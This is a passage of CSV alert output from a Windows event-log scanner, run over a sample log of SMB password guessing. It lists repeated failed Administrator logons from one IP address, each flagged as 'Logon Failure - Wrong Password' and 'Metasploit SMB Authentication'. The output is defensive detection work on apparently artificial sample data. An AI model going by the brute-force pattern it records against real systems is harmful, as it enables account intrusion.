Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 